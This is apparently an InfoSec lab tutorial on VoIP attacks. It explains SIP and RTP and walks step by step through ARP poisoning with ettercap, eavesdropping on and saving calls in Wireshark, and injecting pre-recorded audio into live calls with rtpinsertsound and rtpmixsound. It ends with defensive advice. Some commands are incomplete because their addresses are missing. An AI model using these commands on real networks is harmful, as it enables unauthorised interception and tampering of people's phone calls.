This lab describes the telephone signal tampering, a type of Man in The Middle attack with the aims to insert, modify and remove VoIP packet to alter the communication session.

The most common VoIP telephone infrastructures are based on two protocols: RTP and SIP.

RTP (Real-time Transport Protocol) is a network protocol for encoding and delivering audio and video signal over IP networks; it provides end-to-end network transport functions suitable for applications transmitting real-time data, such as telephony and video conference.

The Session Initiation Protocol (SIP) is a communications protocol, used both Enterprise and Provider environment, for signaling and controlling multimedia communication sessions: can establish, modify, and terminate sessions with one or more participants such as Internet telephony calls. Its operation is very similar to the HTTP protocol, but is a peer-to-peer, with two types of messages: Request, message sent from the client to the server and Response, message sent from the server to the client.

The Request message provides following main methods:

  • INVITE: initiates a conversation;
  • ACK: Acknowledges from an INVITE message;
  • BYE: Terminates a session call between two users;
  • REGISTER: used to register a location from an SIP user;
  • OPTIONS: allows a UA to query another UA or a proxy server as to its capabilities;
  • CANCEL: used to cancel a pending INVITE request;

The SIP Response messages are three-digit codes, like HTTP:

  • 1xx for Information
  • 2xx for Successful
  • 3xx for Redirection
  • 4xx for Request failure
  • 5xx for Server failure
  • 6xx for Global failure

SIP architecture has five logical core components:

  • User agent (UA), is a client’s application or device that initiates and terminates an SIP connection.
  • Proxy server is a component that receives SIP request from various user agents and routes them to the appropriate next hop.
  • Redirect server is a server which generates redirection answers to the received requests.
  • Registrar server, a server that processes REGISTER requests, to map SIP URI to their current location.
  • Location server is used by redirect server or proxy to find caller’s possible location.

Lab infrastructure

In this lab, to execute and explain VoIP call modification attacks, we use a Local Area Network scenario with the following VMs:

  • Kali Linux, as attacker with
    IP address:
  • Windows Server 2012 R2, as User Agent “A” (UA) with IP address:
  • Windows 7, as User Agent “B” (UA) with IP address:
  • Trixbox, as the VoIP server
    with IP address:

The software tools required for this lab are:

  • Linphone app, a simple open source VoIP client.
  • Ettercap, a powerful suite for Man In The Middle attacks on a LAN.
  • Wireshark, the most popular network sniffing tool.
  • Rtpinsertsound, a tool to insert audio into a specified audio stream.
  • Rtpmixsound, a tool to mix pre-recorded audio in real-time with the audio in the specified target audio stream.
  • Sox, a command line utility that can convert various formats of audio files into other formats.

Step 0 – Setup VoIP configuration

To setting up the current VoIP configuration, we have to go to this path to manage the VoIP server thought web-based application. The default credentials of Trixbox web interface are maint:password.

Now we have to add the User Agent “A” and the User Agent “B” by typing PBX
menu, then PBX setting tab.

In this tab we have to select Extension button, then choose the Generic SIP Device.

Finally, we have to insert the User Extension with its Display Name and the Secret for this account.

In this lab, we set the User Agent “A” with the User Extension as 1000 and 1001 for the User Agent “B”.

All shown steps, with even the commands, are executed on Kali VM (IP:, to reproduce the attacker’s view.

Exercise 1: Eavesdropping attack

VoIP Eavesdropping is a type of network attack that aims to listen to a communication session of others actors, in an unauthorized way. An attacker can use this malicious activity to capture and read contents containing sensitive and confidential information.

Step 1 – ARP poisoning

This threat uses the Man in the Middle concept, in which the attacker can read, insert or modify messages between two communicating parties, without which neither side can know that the communication channel has been compromised by a third party. In the Local Area Network scenario, this attack is possible to perform by poisoning the ARP cache with a spoofed MAC address. To communicate over a LAN network, it requires has the MAC address for the route the network packets correctly; the mapping of MAC address with IP address is managed by Address Resolution Protocol and stored into cache related. This cache can be poisoned, by forging and sending packets to a target containing the spoofed address of the host victim.

To explain these concepts, we use Ettercap tool which contains many types of MITM attacks like ARP poisoning.

To run the ARP poisoning attack with Ettercap, we can run the following command:

$ ettercap –T –M arp:remote –i eth0 / /

// -T = textual version

// -M = type of man in the middle attack

// -i = interface

// / = User agent victim

// / = VoIP server

Step 2 – Starting a VoIP call

To perform the VoIP call analysis in next steps, we have to start a call using our client VoIP application Linphone, from User agent “A” (with the Extension as 1000) to User Agent “B” (with the Extension as 1001). First, we have to register our account to VoIP server of our lab, through the preferences dashboard, located in the options menu and add our configuration previous defined: User Extension, password, and VoIP domain.

After opening the client in User agent “A”, we type the destination user Extension to call it and press Call:

Finally, we must answer the call on the other side Linphone client.

Step 3 – Sniffing packets

After running the ARP poisoning command, we can begin sniffing the VoIP conversation with Wireshark tool. Once launched, with the $ wireshark command, we have to select the eth0 network interface and click to start capturing packet button to sniffing the traffic. After few seconds, we can see the SIP and RTP packets as shown in the following figure.

Step 4 – Graph analysis

To analyze the packets in offline mode, we have to stop the packet capturing activity thought related button. The VoIP packets can be analyzed to view the whole communication and understand the flow. To perform this, we need to go to the Telephony menu of Wireshark and select the VoIP calls tab, then click to Flow functionality.

Step 5 – Listen to conversation

Using Wireshark, we also can analyze the RTP packet as well as session communication, in fact; this tool can compact the packets, decode and reproduce the communication flow to listen to the whole conversation. To listen to the conversation, we have to click on Telephony menu and select VoIP Calls, then select a conversation and finally use a Player
button to serialize the packets. Now we can play the communication using Decode
and Play commands.

Step 6 – Save the conversation

In this step, we proceed with the rescue of the conversation and then reuse it in the future, for the next attack. Using Wireshark to save the conversation in audio format, we have to do the following path: Telephony menu -> RTP -> Show All Streams, then choose a stream to save and select Analyze
-> Save payload in .au format.

Step 7 – Convert the audio conversation format

The audio file is saved in the au format, but most players are not able to read it, so we have to convert it to wav format. We can perform this task using the “Swiss army knife” of sound processing programs named Sox, which converts our file audio into required format. This utility is already present in Debian repository, so we can install it in Kali Linux VM, through the following command:

$ apt-get install sox

After the quick install, we can convert our file into wav format with the following command:

$ sox -r 8000 -V sample.wav

// -r To change the sample rate into 8000

// -V Verbose

// is the audio input, that represents conversation saved

// sample.wav is the audio output in the wav format

Exercise 2: RTP packet tampering

Once successful performed the Man in the Middle attack to eavesdrop on conversations, we can change the communication flow by inserting or replacing RTP packets. With this attack conducted in a proper way, allows it to modify the conversation by entering various pieces of pre-recorded audio. The attack is successful because RTP protocol is vulnerable to media tampering, especially if used without encryption and using the connectionless transport protocol UDP.

The communication session between two VoIP endpoints is controlled by the SSRC (Synchronization Source Identifier), sequence number, and timestamp number. An attacker can capture the RTP packets and replicate them with same SSRC and greater sequence number and timestamp, forcing the destination endpoint to discard those legitimate and to catch the attacker’s packets, because they have a sequence number higher.

Ethical Hacking Training – Resources (InfoSec)

Step 8 – Insert file audio

To demonstrate this scenario, we use the Rtpinsertsound tool, which allows you to insert and replicate RTP messages in the target audio stream by injecting into the communication stream the pre-recorded (in step 5) sample.wav file, by typing the following commands:

$ rtpinsertsound –v –i eth0 –a –A 11198 –b –B 7078 –f 1 –j 50 sample.wav

// -v Verbose output

// -i Network interface

// -a Source IP address

// -A Source UDP port

// -b Destination IP address

// -f Spoof factor

// -j Jitter factor, determining when to transmit a packet as a percentage of the target audio stream’s transmission interval

As a result of this manipulation, during VoIP call the destination user receives the wav file instead of the real message that will effectively be muted, allowing the call modification to the victim gets the injected sample and discarding the legitimate packets, for the whole duration of the sample.

Step 9 – Insert mix file audio

Also, it was used a similar tool, called Rtpmixsound, which allows pre-recorded audio in real-time with the audio mix. We can use this tool by running the following commands:

$ rtpmixsound –i eth0 –a –A 14312 –b –B 7078 sample_mix.wav

// -i Network interface

// -a Source IP address

// -A Source UDP port

// -b Destination IP address

The difference of this tool is that the user on the target receiving end can hear the person on the target transmitting end continue to speak throughout the playback of the bogus prerecorded audio.


This lab has been focused on the call session modification attack, introducing the Eavesdropping and RTP packet tampering attacks.

To protect VoIP infrastructure from this type of attack, it should implement an encryption protocol to encrypt the channel like SVoIP (Secure VoIP), that proposes to secure the clients VOIP, or VOSIP (Voice Over Secure IP), which aims to secure the VoIP network. In this way, we can guarantee the principles of confidentiality, integrity and availability of communication session although it could result in degraded performance. Furthermore, it recommends the use of a firewall or IDS/IPS VoIP oriented, to monitoring RTP traffic and detect or block audio insertion threats.


  • Hacking Exposed VoIP, Voice Over IP Security Secret & Solutions
  • RFC 3261 SIP: Session Initiation Protocol
  • RFC 3550 RTP: A Transport Protocol for Real-Time Applications